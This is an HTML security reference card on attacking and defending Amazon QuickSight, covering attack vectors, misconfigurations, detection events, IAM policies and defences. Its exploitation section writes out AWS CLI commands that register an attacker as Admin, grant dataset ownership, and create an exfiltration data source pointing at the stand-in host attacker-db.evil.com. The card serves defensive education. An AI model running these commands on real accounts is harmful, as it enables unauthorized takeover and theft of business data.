quicksight.html

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Amazon QuickSight Security | AWS Security Cards</title>
<meta name="description" content="Amazon QuickSight is a serverless BI service. Attackers target it to access business data, exploit data source connections, and exfiltrate SPICE datasets.">
<style>
  *, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
  body {
    font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', sans-serif;
    background: #0a0e1a;
    color: #e2e8f0;
    line-height: 1.6;
    padding: 2rem;
    max-width: 1200px;
    margin: 0 auto;
  }
  a { color: #22d3ee; text-decoration: none; }
  a:hover { text-decoration: underline; }

  /* Card Image */
  .card-image {
    border-radius: 1rem;
    overflow: hidden;
    margin-bottom: 2rem;
    border: 1px solid rgba(255,255,255,0.1);
  }
  .card-image img {
    width: 100%;
    height: auto;
    display: block;
  }

  /* Header */
  .header {
    position: relative;
    overflow: hidden;
    border-radius: 1rem;
    background: linear-gradient(135deg, #f9731615, #0a0e1a, #f59e0b15);
    border: 1px solid #f973164d;
    padding: 2.5rem;
    margin-bottom: 2rem;
  }
  .header::before {
    content: '';
    position: absolute;
    top: 0; right: 0;
    width: 24rem; height: 24rem;
    background: #f973160d;
    border-radius: 50%;
    filter: blur(3rem);
  }
  .header-content { position: relative; display: flex; align-items: flex-start; gap: 1.5rem; }
  .header-icon { width: 64px; height: 64px; flex-shrink: 0; }
  .header-icon img { width: 100%; height: 100%; }
  .header-title { font-size: 1.875rem; font-weight: 700; color: #fff; }
  .header-badge {
    display: inline-block;
    padding: 0.25rem 0.75rem;
    background: #f9731633;
    color: #f97316;
    font-size: 0.8rem;
    font-weight: 600;
    border-radius: 999px;
    border: 1px solid #f973164d;
    margin-left: 0.75rem;
    vertical-align: middle;
  }
  .header-desc { color: #94a3b8; max-width: 42rem; margin-top: 0.5rem; }

  /* Stats */
  .stats-row { display: grid; grid-template-columns: repeat(4, 1fr); gap: 1rem; margin-bottom: 2rem; }
  .stat-card {
    background: rgba(255,255,255,0.03);
    border-radius: 0.5rem;
    border: 1px solid rgba(255,255,255,0.06);
    padding: 1rem;
    text-align: center;
  }
  .stat-value { font-size: 1.5rem; font-weight: 700; }
  .stat-label { font-size: 0.8rem; color: #94a3b8; }

  /* Sections */
  .section {
    background: rgba(255,255,255,0.03);
    border-radius: 0.75rem;
    border: 1px solid rgba(255,255,255,0.06);
    padding: 1.5rem;
    margin-bottom: 1.5rem;
  }
  .section h2 {
    font-size: 1.25rem;
    font-weight: 700;
    color: #fff;
    margin-bottom: 1rem;
    display: flex;
    align-items: center;
    gap: 0.5rem;
  }

  /* Overview */
  .overview-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1.5rem; }
  .overview-grid h4 { font-size: 0.9rem; font-weight: 600; margin-bottom: 0.5rem; }
  .overview-grid p { font-size: 0.875rem; color: #94a3b8; margin-bottom: 0.75rem; }
  .attack-note {
    background: rgba(0,0,0,0.3);
    border-radius: 0.5rem;
    border: 1px solid rgba(255,255,255,0.06);
    padding: 0.75rem;
    font-size: 0.875rem;
    color: #cbd5e1;
  }

  /* Risk Gauge */
  .risk-gauge { display: flex; align-items: center; gap: 2rem; }
  .risk-bar-container { flex: 1; }
  .risk-bar {
    height: 1rem;
    background: #0f172a;
    border-radius: 999px;
    overflow: hidden;
  }
  .risk-bar-fill {
    height: 100%;
    border-radius: 999px;
    background: linear-gradient(90deg, #eab308, #f97316, #ef4444);
  }
  .risk-labels { display: flex; justify-content: space-between; font-size: 0.8rem; color: #94a3b8; margin-top: 0.5rem; }
  .risk-score { text-align: center; }
  .risk-score-value { font-size: 2.5rem; font-weight: 700; color: #f87171; }
  .risk-score-label { font-size: 0.8rem; color: #94a3b8; }
  .risk-desc { margin-top: 1rem; font-size: 0.875rem; color: #94a3b8; }

  /* Panels Grid */
  .panels-grid { display: grid; grid-template-columns: repeat(3, 1fr); gap: 1.5rem; margin-bottom: 1.5rem; }
  @media (max-width: 1024px) { .panels-grid { grid-template-columns: repeat(2, 1fr); } }
  @media (max-width: 640px) { .panels-grid, .stats-row, .overview-grid { grid-template-columns: 1fr; } }
  .panel {
    background: rgba(255,255,255,0.03);
    border-radius: 0.75rem;
    border: 1px solid;
    padding: 1.5rem;
  }
  .panel h3 { font-size: 1.1rem; font-weight: 700; margin-bottom: 1rem; display: flex; align-items: center; gap: 0.5rem; }
  .panel h4 { font-size: 0.85rem; font-weight: 600; margin-bottom: 0.5rem; margin-top: 1rem; }
  .panel ul { list-style: none; padding: 0; }
  .panel li {
    font-size: 0.85rem;
    color: #cbd5e1;
    padding: 0.15rem 0;
    display: flex;
    align-items: flex-start;
    gap: 0.5rem;
  }
  .bullet { margin-top: 0.15rem; }
  .note {
    margin-top: 1rem;
    padding: 0.75rem;
    border-radius: 0.5rem;
    font-size: 0.85rem;
  }

  /* Commands */
  .cmd-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1rem; }
  .cmd-block { margin-top: 0.75rem; }
  .cmd-title { font-size: 0.8rem; color: #94a3b8; margin-bottom: 0.25rem; }
  pre {
    background: rgba(0,0,0,0.5);
    border-radius: 0.5rem;
    padding: 0.75rem;
    font-size: 0.8rem;
    color: #4ade80;
    overflow-x: auto;
    border: 1px solid rgba(255,255,255,0.06);
    white-space: pre-wrap;
    word-break: break-all;
    font-family: 'SF Mono', 'Fira Code', 'Cascadia Code', monospace;
  }

  /* Policies */
  .policy-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1.5rem; }
  .policy-card {
    border-radius: 0.5rem;
    border: 1px solid;
    padding: 1rem;
  }
  .policy-header { display: flex; align-items: center; gap: 0.5rem; margin-bottom: 0.75rem; font-size: 0.9rem; }
  .policy-card pre { margin-bottom: 0.75rem; color: #cbd5e1; }
  .policy-desc { font-size: 0.8rem; color: #94a3b8; }

  /* Defenses */
  .defense-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1rem; }
  .defense-card {
    background: rgba(255,255,255,0.03);
    border-radius: 0.5rem;
    border: 1px solid rgba(255,255,255,0.06);
    padding: 1rem;
  }
  .defense-card:hover { border-color: #22d3ee4d; }
  .defense-header { display: flex; align-items: flex-start; gap: 0.75rem; }
  .defense-icon { font-size: 1.5rem; }
  .defense-card h4 { font-size: 0.9rem; font-weight: 600; color: #fff; margin-bottom: 0.25rem; }
  .defense-card p { font-size: 0.85rem; color: #94a3b8; margin-bottom: 0.5rem; }
  .defense-card pre { color: #22d3ee; }

  /* Footer */
  .footer { text-align: center; padding: 1.5rem 0; font-size: 0.8rem; color: #64748b; }
  .footer a { color: #22d3ee; }

  /* Prevent ugly page-break splits */
  .card-image,
  .header,
  .stat-card,
  .stats-row,
  .section,
  .panel,
  .cmd-block,
  .policy-card,
  .defense-card,
  .attack-note,
  .overview-grid > div,
  .risk-gauge,
  .note {
    break-inside: avoid;
    page-break-inside: avoid;
  }
  .section,
  .panels-grid,
  .card-image,
  .header {
    break-before: auto;
    page-break-before: auto;
  }
  /* Keep headings with their content */
  h2, h3, h4 {
    break-after: avoid;
    page-break-after: avoid;
  }

  @media print {
    body { background: #0a0e1a; -webkit-print-color-adjust: exact; print-color-adjust: exact; }
    .panels-grid { grid-template-columns: repeat(2, 1fr); }
    .cmd-grid { grid-template-columns: 1fr; }
    .policy-grid { grid-template-columns: 1fr; }
    .defense-grid { grid-template-columns: 1fr; }
  }
</style>
</head>
<body>

<!-- Card Image -->
<div class="card-image">
  <img src="../images/quicksight-card.webp" alt="Amazon QuickSight Security" />
</div>

<!-- Header -->
<div class="header">
  <div class="header-content">
    <div class="header-icon"><img src="../icons/quicksight.svg" alt="Amazon QuickSight Security" /></div>
    <div>
      <div>
        <span class="header-title">Amazon QuickSight Security</span>
        <span class="header-badge">ANALYTICS</span>
      </div>
      <p class="header-desc">Amazon QuickSight is a serverless, cloud-scale business intelligence (BI) service. Attackers target QuickSight to access visualized business data, exploit data source connections to reach backend databases, exfiltrate SPICE dataset contents, and abuse embedded dashboard URLs to leak sensitive analytics.</p>
    </div>
  </div>
</div>

<!-- Stats -->
<div class="stats-row">
        <div class="stat-card">
          <div class="stat-value" style="color: #f87171;">HIGH</div>
          <div class="stat-label">Data Exposure</div>
        </div>
        <div class="stat-card">
          <div class="stat-value" style="color: #4ade80;">Per GB</div>
          <div class="stat-label">SPICE Storage</div>
        </div>
        <div class="stat-card">
          <div class="stat-value" style="color: #60a5fa;">URL Leak</div>
          <div class="stat-label">Embedded Risk</div>
        </div>
        <div class="stat-card">
          <div class="stat-value" style="color: #c084fc;">Namespaces</div>
          <div class="stat-label">Multi-Tenant</div>
        </div></div>

<!-- Overview -->
<div class="section"><h2><span style="color:#f97316;">&#x1F4CB;</span> Service Overview</h2><div class="overview-grid">
        <div>
          <h4 style="color: #f97316;">Data Sources &amp; SPICE Datasets</h4>
          <p>QuickSight connects to S3, Athena, RDS, Redshift, Aurora, OpenSearch, and on-prem databases. Data can be queried directly or imported into SPICE for in-memory performance.</p>
          <div class="attack-note"><span style="color:#f97316;">Attack note:</span> Data source connections store credentials to access backend databases. Compromising QuickSight data source configs can reveal database connection strings and credential references.</div>
        </div>
        <div>
          <h4 style="color: #f97316;">Dashboards, Embedding &amp; Users</h4>
          <p>Dashboards can be shared or embedded in external applications via signed URLs. QuickSight manages its own user directory with Admin, Author, and Reader roles, separate from IAM.</p>
          <div class="attack-note"><span style="color:#f97316;">Attack note:</span> An attacker with IAM access to QuickSight API can register themselves as a QuickSight Admin, gaining full access to all dashboards and datasets.</div>
        </div></div></div>

<!-- Risk Assessment -->
<div class="section">
  <h2>Security Risk Assessment</h2>
  <div class="risk-gauge">
    <div class="risk-bar-container">
      <div class="risk-bar">
        <div class="risk-bar-fill" style="width: 75%;"></div>
      </div>
      <div class="risk-labels"><span>Low</span><span>Medium</span><span>High</span><span>Critical</span></div>
    </div>
    <div class="risk-score">
      <div class="risk-score-value">7.5</div>
      <div class="risk-score-label">Risk Score</div>
    </div>
  </div>
  <p class="risk-desc">QuickSight aggregates data from multiple backend sources into a single analytics layer. Compromising it can expose summarized business data, reveal backend database connection details, and provide a pivot point to underlying data stores.</p>
</div>

<!-- Main Panels -->
<div class="panels-grid">
      <div class="panel" style="border-color: #f8717133;">
        <h3 style="color: #f87171;">&#x2694;&#xFE0F; Attack Vectors</h3><h4 style="color: #f87171;">Data Access Abuse</h4><ul><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Register as QuickSight Admin via API</li><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Enumerate all datasets and dashboards</li><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Exploit data source connections for backend DB creds</li><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Export SPICE dataset contents</li><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Abuse direct query mode for arbitrary queries</li></ul><h4 style="color: #f87171;">Embedding &amp; Sharing Exploitation</h4><ul><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Generate embedded dashboard URLs for unauthorized access</li><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Intercept or reuse signed embedding URLs</li><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Share dashboards with overly broad permissions</li><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Exploit anonymous embedding without RLS</li><li><span class="bullet" style="color: #f87171;">&#x2022;</span> Create data sources pointing to attacker databases</li></ul></div>
      <div class="panel" style="border-color: #fb923c33;">
        <h3 style="color: #fb923c;">&#x26A0;&#xFE0F; Misconfigurations</h3><h4 style="color: #fb923c;">Access Issues</h4><ul><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> No row-level security (RLS) on shared datasets</li><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> No column-level security (CLS) on sensitive fields</li><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> Overly permissive dataset sharing (all Authors as Owners)</li><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> QuickSight Admin role assigned unnecessarily</li><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> IAM policies granting quicksight:* broadly</li></ul><h4 style="color: #fb923c;">Data Protection Gaps</h4><ul><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> SPICE encryption using only AWS-managed keys</li><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> VPC connections not configured for private data sources</li><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> Embedded dashboards without namespace isolation</li><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> Data source credentials stored directly</li><li><span class="bullet" style="color: #fb923c;">&#x2022;</span> No IP restrictions on QuickSight access</li></ul></div>
      <div class="panel" style="border-color: #22d3ee33;">
        <h3 style="color: #22d3ee;">&#x1F50D; Enumeration</h3><div class="cmd-block">
          <div class="cmd-title">List All Dashboards</div>
          <pre><code>aws quicksight list-dashboards \
  --aws-account-id 123456789012</code></pre>
        </div><div class="cmd-block">
          <div class="cmd-title">List All Datasets</div>
          <pre><code>aws quicksight list-data-sets \
  --aws-account-id 123456789012</code></pre>
        </div><div class="cmd-block">
          <div class="cmd-title">List All Data Sources</div>
          <pre><code>aws quicksight list-data-sources \
  --aws-account-id 123456789012</code></pre>
        </div><div class="cmd-block">
          <div class="cmd-title">Describe Data Source (Connection Details)</div>
          <pre><code>aws quicksight describe-data-source \
  --aws-account-id 123456789012 \
  --data-source-id my-data-source-id</code></pre>
        </div><div class="cmd-block">
          <div class="cmd-title">List QuickSight Users</div>
          <pre><code>aws quicksight list-users \
  --aws-account-id 123456789012 --namespace default</code></pre>
        </div></div>
      <div class="panel" style="border-color: #c084fc33;">
        <h3 style="color: #c084fc;">&#x1F4C8; Privilege Escalation</h3><h4 style="color: #c084fc;">QuickSight-Level Escalation</h4><ul><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Register as Admin via register-user with ADMIN role</li><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Grant self Owner permissions on datasets</li><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Create data source with attacker-controlled credentials</li><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Share dashboards to attacker-controlled user</li><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Bypass RLS by accessing dataset as Owner</li></ul><h4 style="color: #c084fc;">Data-Level Escalation</h4><ul><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Access data sources to discover DB connection params</li><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Pivot from QuickSight to backend RDS/Redshift</li><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Create datasets from sensitive data sources</li><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Use direct query mode for arbitrary queries</li><li><span class="bullet" style="color: #c084fc;">&#x2022;</span> Owners bypass RLS -- this is by design</li></ul><div class="note"><strong>Key insight:</strong> Row-level security does NOT apply to dataset Owners. If an attacker gains Owner access, they see all rows regardless of RLS rules.</div></div>
      <div class="panel" style="border-color: #facc1533;">
        <h3 style="color: #facc15;">&#x1F517; Persistence</h3><h4 style="color: #facc15;">Account-Level</h4><ul><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Register hidden QuickSight user in non-default namespace</li><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Create scheduled dataset refresh for ongoing access</li><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Add attacker group with access to key dashboards</li><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Create exfiltration data source to attacker DB</li><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Save analyses querying sensitive datasets</li></ul><h4 style="color: #facc15;">Embedding-Based</h4><ul><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Repeatedly generate embedded URLs for ongoing access</li><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Create namespace with attacker-controlled users</li><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Register anonymous embedding configuration</li><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Leverage short-lived tokens (5-minute single-use)</li><li><span class="bullet" style="color: #facc15;">&#x2022;</span> Maintain SPICE dataset access via scheduled refreshes</li></ul></div>
      <div class="panel" style="border-color: #4ade8033;">
        <h3 style="color: #4ade80;">&#x1F6E1;&#xFE0F; Detection</h3><h4 style="color: #4ade80;">CloudTrail Events</h4><ul><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> RegisterUser - new QuickSight user registration</li><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> CreateDataSource - new data source connection</li><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> UpdateDataSetPermissions - permission changes</li><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> GenerateEmbedUrlForAnonymousUser - anon embedding</li><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> DescribeDataSource - credential reconnaissance</li></ul><h4 style="color: #4ade80;">Behavioral Indicators</h4><ul><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> New Admin user registered via API</li><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> Data source created pointing to unknown endpoints</li><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> Bulk dataset enumeration (multiple list calls)</li><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> Embedded URL generation from unexpected principals</li><li><span class="bullet" style="color: #4ade80;">&#x2022;</span> Permission grants to previously unknown users</li></ul></div></div>

<!-- Exploitation -->
<div class="section"><h2><span style="color:#f87171;">&#x1F4BB;</span> Exploitation Commands</h2><div class="cmd-grid"><div class="cmd-block">
          <div class="cmd-title">Register Attacker as QuickSight Admin</div>
          <pre><code>aws quicksight register-user \
  --aws-account-id 123456789012 \
  --namespace default --identity-type IAM \
  --iam-arn arn:aws:iam::123456789012:user/attacker \
  --user-role ADMIN --email attacker@example.com</code></pre>
        </div><div class="cmd-block">
          <div class="cmd-title">Grant Self Owner Access to Dataset</div>
          <pre><code>aws quicksight update-data-set-permissions \
  --aws-account-id 123456789012 \
  --data-set-id target-dataset-id \
  --grant-permissions Principal=ATTACKER_ARN,Actions=quicksight:DescribeDataSet,quicksight:UpdateDataSet</code></pre>
        </div><div class="cmd-block">
          <div class="cmd-title">Describe Data Source (Extract Connection Info)</div>
          <pre><code>aws quicksight describe-data-source \
  --aws-account-id 123456789012 \
  --data-source-id target-ds-id</code></pre>
        </div><div class="cmd-block">
          <div class="cmd-title">Create Exfiltration Data Source</div>
          <pre><code>aws quicksight create-data-source \
  --aws-account-id 123456789012 \
  --data-source-id exfil --name exfil --type MYSQL \
  --data-source-parameters '{"MySqlParameters":{"Host":"attacker-db.evil.com","Port":3306,"Database":"exfil"}}'</code></pre>
        </div></div></div>

<!-- Policies -->
<div class="section"><h2><span style="color:#4ade80;">&#x1F4DC;</span> Policy Examples</h2><div class="policy-grid"><div class="policy-card" style="border-color: #ef444433; background: rgba(239,68,68,0.05);">
          <div class="policy-header">
            <span style="color: #f87171; font-size: 1.2em;">&#x2717;</span>
            <span style="color: #f87171; font-weight: 600;">Dangerous - Full QuickSight Access</span>
          </div>
          <pre><code>{
  &quot;Effect&quot;: &quot;Allow&quot;,
  &quot;Action&quot;: &quot;quicksight:*&quot;,
  &quot;Resource&quot;: &quot;*&quot;
}</code></pre>
          <p class="policy-desc">Full access allows user registration as Admin, data source creation, dataset export, and embedded URL generation</p>
        </div><div class="policy-card" style="border-color: #22c55e33; background: rgba(34,197,94,0.05);">
          <div class="policy-header">
            <span style="color: #4ade80; font-size: 1.2em;">&#x2713;</span>
            <span style="color: #4ade80; font-weight: 600;">Secure - Read-Only Dashboard Access</span>
          </div>
          <pre><code>{
  &quot;Effect&quot;: &quot;Allow&quot;,
  &quot;Action&quot;: [
    &quot;quicksight:DescribeDashboard&quot;,
    &quot;quicksight:ListDashboards&quot;,
    &quot;quicksight:GetDashboardEmbedUrl&quot;
  ],
  &quot;Resource&quot;: &quot;arn:aws:quicksight:*:*:dashboard/*&quot;
}</code></pre>
          <p class="policy-desc">Scoped to dashboard-only access without data source or dataset modification</p>
        </div><div class="policy-card" style="border-color: #22c55e33; background: rgba(34,197,94,0.05);">
          <div class="policy-header">
            <span style="color: #4ade80; font-size: 1.2em;">&#x2713;</span>
            <span style="color: #4ade80; font-weight: 600;">Secure - Deny User Registration</span>
          </div>
          <pre><code>{
  &quot;Effect&quot;: &quot;Deny&quot;,
  &quot;Action&quot;: &quot;quicksight:RegisterUser&quot;,
  &quot;Resource&quot;: &quot;*&quot;
}</code></pre>
          <p class="policy-desc">Prevents unauthorized QuickSight user registration (especially ADMIN role)</p>
        </div></div></div>

<!-- Defenses -->
<div class="section"><h2><span style="color:#4ade80;">&#x1F6E1;&#xFE0F;</span> Defense Recommendations</h2><div class="defense-grid"><div class="defense-card">
          <div class="defense-header">
            <span class="defense-icon">&#x1F512;</span>
            <div>
              <h4>Enable Row-Level and Column-Level Security</h4>
              <p>Apply RLS on all shared datasets and CLS to hide sensitive columns. Enterprise edition required. Owners bypass RLS.</p>
            </div>
          </div>
        </div><div class="defense-card">
          <div class="defense-header">
            <span class="defense-icon">&#x1F511;</span>
            <div>
              <h4>Use Customer-Managed Keys for SPICE</h4>
              <p>Enable CMK encryption for SPICE datasets via the QuickSight console under SPICE encryption settings.</p>
            </div>
          </div>
        </div><div class="defense-card">
          <div class="defense-header">
            <span class="defense-icon">&#x1F310;</span>
            <div>
              <h4>Configure VPC Connections for Private Sources</h4>
              <p>Use VPC connections to access private data sources without traversing the public internet.</p>
            </div>
          </div>
        </div><div class="defense-card">
          <div class="defense-header">
            <span class="defense-icon">&#x1F464;</span>
            <div>
              <h4>Restrict User Registration</h4>
              <p>Deny quicksight:RegisterUser for non-admin principals. Monitor RegisterUser CloudTrail events.</p>
            </div>
          </div>
        </div><div class="defense-card">
          <div class="defense-header">
            <span class="defense-icon">&#x1F510;</span>
            <div>
              <h4>Use Secrets Manager for Data Source Creds</h4>
              <p>Store database credentials in Secrets Manager rather than directly in QuickSight data source configurations.</p>
            </div>
          </div>
        </div><div class="defense-card">
          <div class="defense-header">
            <span class="defense-icon">&#x1F4CA;</span>
            <div>
              <h4>Monitor with CloudTrail</h4>
              <p>Alert on RegisterUser (especially ADMIN), CreateDataSource, UpdateDataSetPermissions, and GenerateEmbedUrlForAnonymousUser.</p>
            </div>
          </div>
        </div></div></div>

<!-- Footer -->
<div class="footer">
  <p>Amazon QuickSight Security Security Card</p>
  <p style="margin-top:0.25rem;">Always obtain proper authorization before testing</p>
</div>

</body>
</html>